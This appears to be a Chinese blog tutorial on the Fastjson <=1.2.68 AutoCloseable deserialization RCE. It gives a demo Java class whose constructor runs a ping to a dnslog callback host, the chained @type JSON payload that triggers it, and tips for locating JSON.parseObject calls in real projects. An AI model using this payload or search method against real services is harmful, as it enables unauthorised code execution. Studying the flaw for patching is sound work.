fastjson <=1.2.68 远程代码执行漏洞 学习

本文详细介绍了Fastjson 1.2.68及之前版本的远程代码执行漏洞,通过创建特定的Java类并利用`AutoCloseable`接口,展示了如何触发漏洞执行任意命令。在Spring MVC项目中,演示了如何引入Fastjson并利用该漏洞。同时,给出了实际项目中查找此类漏洞的方法,提醒开发者关注Fastjson的安全更新。
摘要由CSDN通过智能技术生成

fastjson <=1.2.68 远程代码执行漏洞 学习

环境

1、 MAC
2、Java版本为 1.8.0_261 。
3、Mysql版本为 5.7 。我用的是PHPstudy集成的。
4、IDEA版本随意。

项目

创建一个spring 项目mavc
在这里插入图片描述

pom.xml引用fastjson

<dependency>
  <groupId>com.alibaba</groupId>
  <artifactId>fastjson</artifactId>
  <version>1.2.58</version>
</dependency>

创建demo_fastjson.java

package com.xq.tmall;

import com.alibaba.fastjson.JSON;

public class demo_fastjson {
    public static class User{
        private String id;
        User(){
            System.out.println("User go");
        }
        public void setId(String ids){
            System.out.println("setId go");
            this.id=ids;
        }
        public String getId(){
            System.out.println("GetId go");
            return this.id;
        }
    }

    public static void main(String[] args){

        //案例1
        //了解type 调用方式
        User a = new User();
        String json = JSON.toJSONString(a);
        System.out.println(json);
        //获取序列化的路径执行
        System.out.println(JSON.parseObject(json,User.class));
        System.out.println("-----------------");
        //type 传入恶意的json ,就会被反序列化执行
        System.out.println(JSON.parseObject("{\"@type\":\"com.xq.tmall.demo_fastjson$User\",\"id\":\"123\"}"));
    }
}

输出
通过

漏洞利用

前面已经说到如何去利用,所以这里需要寻找一个子类或实现非常多的类或接口都行,在实际中还是主要看checkAutoType方法中,有哪些对象或接口可以通过校验,实际测试中存在如下几种:

白名单(符合白名单条件的类)
TypeUtils.mappings (符合缓存映射中获取的类)
typeMapping (ParserConfig中本身带有的集合)
deserializers (符合反序列化器的类)
测试中发现实际上 TypeUtils.mappings 中含有相当多的类,其中就包括了接口 java.lang.AutoCloseable

创建一个VulAutoClos.java

package com.xq.tmall;

import java.io.IOException;


//需要继承 AutoCloseable
public class VulAutoClos implements AutoCloseable {
    public VulAutoClos(){
        try {
            Runtime.getRuntime().exec("ping 22.tzw9oj.dnslog.cn");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void close() throws Exception {

    }
}

在main函数调用JSON.parseObject

//案例2:
        //通过AutoCloseable 调用指定类
        System.out.println(JSON.parseObject("{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.xq.tmall.VulAutoClos\",\"cmd\":\"calc\"}\n"));

在这里插入图片描述
现在直接允许,就成功调用了VulAutoClos 类,ping命令dnslog 成功,收到
在这里插入图片描述

某项目案例

pom 使用了fastjon
在这里插入图片描述
全局搜索文件【JSON.parseObject(】,查看是有有使用并参数可控
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值